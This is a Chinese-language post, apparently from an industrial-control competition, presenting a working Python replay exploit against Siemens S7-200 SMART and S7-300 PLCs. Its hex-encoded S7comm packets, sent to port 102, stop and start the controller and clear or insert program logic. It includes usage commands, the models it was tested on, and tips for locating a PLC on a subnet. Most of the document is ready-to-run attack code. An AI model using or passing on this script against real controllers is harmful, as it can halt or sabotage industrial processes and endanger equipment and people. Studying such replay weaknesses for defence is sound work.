比赛遇到了S7-200smart的脚本控制,由于型号比较老,流量没有什么认证和加密,直接用wireshark抓到正常通信的包,然后重放即可,目前功能有:
- 启动
- 停止
- 清空逻辑
- 插入逻辑
在以下型号上测试成功:
- s7-200 : 6ES7 288-1ST20-0AA0
- s7-300 : 6ES7 315-2EH14-0AB0
用法:
➜ python exp.py 192.168.2.1 stop
➜ python exp.py 192.168.2.1 run
➜ python exp.py 192.168.2.1 clear
➜ python exp.py 192.168.2.1 insert
import socket,sys
cotp = "0300001611e00000000100c1021000c2020300c0010a".decode("hex")
setcom = "0300001902f08032010000ccc100080000f0000001000103c0".decode("hex")
stop = "0300002102f080320100000e000010000029000000000009505f50524f4752414d".decode('hex')
start = "0300002502f080320100000c000014000028000000000000fd000009505f50524f4752414d".decode("hex")
clearob = "0300002b02f080320100000038001a000028000000000000fd000a01003038303030303150055f494e5345".decode("hex")
insertob = "0300002b02f0803201000000b2001a000028000000000000fd000a01003038303030303150055f494e5345".decode("hex")
a = "0300003102f0803201000001ed00200000fa00010000000000095f30383030303031500d01303030313435303030303136".decode("hex")
b = "030000b802f0803201000001ef00120095fb00010000000000095f3038303030303150009100fb707000001308000100000091000000000033f66033360033f63133360000005d00000010fe9c014a8292aeedd60000e9cd0000e50600b1060000789c636760646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea000011ab07dd".decode("hex")
c = "0300002302f0803201000001f000120000fc00010000000000095f3038303030303150".decode("hex")
fa = "0300003102f0803201000000ae00200000fa00010000000000095f30383030303031500d01303030313439303030303230".decode("hex")
fb = "030000bc02f0803201000000b000120099fb00010000000000095f3038303030303150009500fb7070000013080001000000950000000000495ce13354003a5e9e33540000005d00000014fe9c014a82940711806340edd60000e9cd0000e50600b1060000789ce36660646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea00002c6f07e1".decode("hex")
fc = "0300002302f0803201000000b100120000fc00010000000000095f3038303030303150".decode("hex")
s = socket.socket()
def s7200start():
s.send(cotp)
s.recv(1024)
s.send(setcom)
s.recv(1024)
s.send(start)
s.recv(1024)
def s7200stop():
s.send(cotp)
s.recv(1024)
s.send(setcom)
s.recv(1024)
s.send(stop)
s.recv(1024)
def s7200clearob():
s.send(cotp)
s.recv(1024)
s.send(setcom)
s.recv(1024)
s.send(stop)
s.recv(1024)
s.send(a)
s.recv(1024)
s.send(b)
s.recv(1024)
s.send(c)
s.recv(1024)
s.send(clearob)
s.recv(1024)
s.send(start)
s.recv(1024)
def s7200insertob():
s.send(cotp)
s.recv(1024)
s.send(setcom)
s.recv(1024)
s.send(stop)
s.recv(1024)
s.send(fa)
s.recv(1024)
s.send(fb)
s.recv(1024)
s.send(fc)
s.recv(1024)
s.send(insertob)
s.recv(1024)
s.send(start)
s.recv(1024)
if __name__ == "__main__":
s.connect((sys.argv[1],102))
if sys.argv[2]=="run" :
s7200start()
elif sys.argv[2]=="stop":
s7200stop()
elif sys.argv[2]=="clear":
s7200clearob()
elif sys.argv[2]=="insert":
s7200insertob()
注:
- 如果忘了PLC的C段的具体IP,直接用网线将电脑与PLC直连,然后将网口的IP地址随便设置到目标C段的任意地址,然后扫描C段即可。
- 如果连C段地址都忘了只能使用二层协议进行PLC发现。